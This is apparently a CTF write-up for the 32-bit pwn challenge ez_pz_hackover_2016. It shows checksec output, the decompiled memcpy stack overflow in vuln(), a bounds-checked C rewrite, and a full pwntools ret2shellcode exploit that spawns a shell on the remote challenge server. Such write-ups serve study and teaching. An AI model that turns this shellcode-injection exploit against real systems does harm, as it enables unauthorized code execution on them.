【ez_pz_hackover_2016】WriteUp
checksec
checksec shows that NX is not enabled (the binary has no GNU_STACK program header, so the stack is executable), which makes ret2shellcode a viable approach.
[*] '/home/bronya/Documents/CTF/pwn17/ez_pz_hackover_2016'
Arch: i386-32-little
RELRO: Full RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x8048000)
Stack: Executable
RWX: Has RWX segments
Looking at the binary in IDA reveals a stack overflow in vuln(): dest is only 50 bytes, but the copy length n is 0x400, so shellcode can be written into dest and the saved return address overwritten.
void *__cdecl vuln(int src, size_t n)
{
char dest[50]; // [esp+6h] [ebp-32h] BYREF
return memcpy(dest, &src, n);
}
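For comparison, the vulnerable shape next to a bounds-checked rewrite. This is an added example, not code from the challenge binary; vuln_original mirrors the decompiled function above, and vuln_checked, kInput and g_out are names introduced here.

```c
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define DEST_SIZE 50   /* same size as the challenge's char dest[50] */

/* constructed sample input: the "crashme" prefix the challenge expects */
static const char kInput[] = "crashme";
static char g_out[DEST_SIZE];

/* Vulnerable shape from the decompilation (only ever called here with a
 * small n): memcpy() trusts the caller-supplied n, so n = 0x400 copies
 * 0x3ce bytes past dest, over the saved EBP and the return address. */
static void vuln_original(const void *src, size_t n)
{
    char dest[DEST_SIZE];
    memcpy(dest, src, n);          /* no check of n against sizeof dest */
    (void)dest;
}

/* Hardened rewrite (assumed fix, not the challenge's code): the length is
 * validated against the destination before memcpy() runs. Returns the
 * number of bytes copied, or -1 when n would overflow the buffer.
 * copied_out receives the local buffer so the result can be inspected. */
static int vuln_checked(const void *src, size_t n, char *copied_out)
{
    char dest[DEST_SIZE] = {0};
    if (src == NULL || n > sizeof dest)
        return -1;                 /* reject instead of smashing the stack */
    memcpy(dest, src, n);
    if (copied_out != NULL)
        memcpy(copied_out, dest, sizeof dest);
    return (int)n;
}

int main(void)
{
    vuln_original(kInput, sizeof kInput);   /* safe length, for comparison */
    printf("n=%zu -> %d\n", sizeof kInput,
           vuln_checked(kInput, sizeof kInput, g_out));
    printf("n=0x400 -> %d\n", vuln_checked(kInput, 0x400, g_out));
    return 0;
}
```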
Build the exploit:
from pwn import *
context(arch='i386', log_level='debug')
# p = process('./ez_pz_hackover_2016')
# gdb.attach(p, 'b *0x0804865D')
p = remote('node4.buuoj.cn', 26972)
elf = ELF('./ez_pz_hackover_2016')
printf_got = elf.got['printf']
printf_plt = elf.plt['printf']
shellcode = asm(shellcraft.sh())  # generate the shellcode; asm() assembles it
p.recvuntil(b'Yippie, lets crash: 0x')
buf_addr = int(p.recv(8), 16) - 0x1c
print(hex(buf_addr))
shellcode_addr = buf_addr
payload = flat(b'crashme\x00', b'a'*(0x16-8), 0x0, shellcode_addr, shellcode)
p.sendlineafter(b'>', payload)
p.interactive()